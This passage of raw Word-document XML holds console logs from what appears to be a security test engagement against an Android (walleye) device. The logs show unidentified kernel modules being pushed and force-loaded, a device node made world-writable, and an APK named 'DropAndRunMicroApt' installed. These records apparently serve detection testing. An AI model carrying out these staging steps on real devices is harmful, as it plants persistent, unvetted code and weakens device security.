      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-mips64/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72451F9E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-x86/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DAF6D1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-x86_64/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3BAB08" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/uml/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1D3C74" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/google/dragon/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA51338" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/google/marlin/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF2675" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/google/muskie/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D32B8B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/google/taimen/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A79EB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/huawei/angler/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64011E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/lge/bullhead/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BA015" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/linaro/hikey/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39892AB5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including sdk/bash_completion/adb.bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E383CDD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E83E5B2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>============================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F975D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>PLATFORM_VERSION_CODENAME=REL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E7905" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>PLATFORM_VERSION=8.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE56B11" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_PRODUCT=aosp_walleye</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B493222" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_BUILD_VARIANT=userdebug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52151CB7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_BUILD_TYPE=release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFB7492" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_PLATFORM_VERSION=OPM1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3C194" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_BUILD_APPS=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1641FB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_ARCH=arm64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EDED4A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_ARCH_VARIANT=armv8-a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B4DEB6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_CPU_VARIANT=cortex-a73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D0DA1C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_2ND_ARCH=arm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C56E4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_2ND_ARCH_VARIANT=armv7-a-neon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE1FD3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_2ND_CPU_VARIANT=cortex-a73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A07C7EF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_ARCH=x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678DCCFA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_2ND_ARCH=x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FD72A7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_OS=linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272456B9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_OS_EXTRA=Linux-4.4.0-146-generic-x86_64-with-glibc2.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381FB9D2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_CROSS_OS=windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34287320" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_CROSS_ARCH=x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED55132" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_CROSS_2ND_ARCH=x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289891FB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_BUILD_TYPE=release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025011C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>BUILD_ID=OPM4.171019.021.E1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8481F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>OUT_DIR=out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E3828A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>AUX_OS_VARIANT_LIST=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5313AF9D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>============================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3544FED1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>/home/user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F0572B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate-test ~]$ adb push a64.ko /data/local/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494CCBC9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>a64.ko: 1 file pushed. 0.2 MB/s (5824 bytes in 0.033s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2232BC95" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate-test ~]$ adb push msm_g711tlaw.ko /data/local/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F795C73" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>msm_g711tlaw.ko: 1 file pushed. 1.2 MB/s (10128 bytes in 0.008s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC63B8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEA6FAC" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECAED8E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate-test ~]$ adb shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0832C8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/ # cd data/local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57910676" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local # chmod 777 tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B1B49B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local # cd tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A930C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">walleye:/data/local/tmp # insmod msm_g711tlaw.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18980D33" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # mknod /dev/msm_g711tlaw c 500 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F2F34" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # chmod 666 /dev/msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0290EB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # chgrp shell /dev/msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607E5598" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # chown shell /dev/msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A69A55" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">walleye:/data/local/tmp # insmod a64.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377BA138" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE4C23A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Module                  Size  Used by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFBFF98" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>driver                  1909  1551790190 [permanent]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489197F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>driver2                 4581  1551778678 [permanent]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA40E94" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D01DE8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55181476" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5E223" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ rm a64.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03512871" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ rm msm_g711tlaw.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8934B7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate-test ~]$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B83D21" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DF400" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Connection to 128.55.12.114 closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E569C1C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAFBE9C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70301174" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb shell  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A847A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3759278B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724ED6A3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ cp DropAndRunMicroApt-instr.apk myapp.apk                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D0E92" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp myapp.apk user@128.55.12.54:.                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74CB7C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">user@128.55.12.54's password:                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF22B8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">myapp.apk                                                                                          100%   83KB  82.8KB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3E267" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA18964" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>15:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1620CAD3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb install myapp.apk                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311C01F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">Success   </w:t>
      </w:r>
    </w:p>
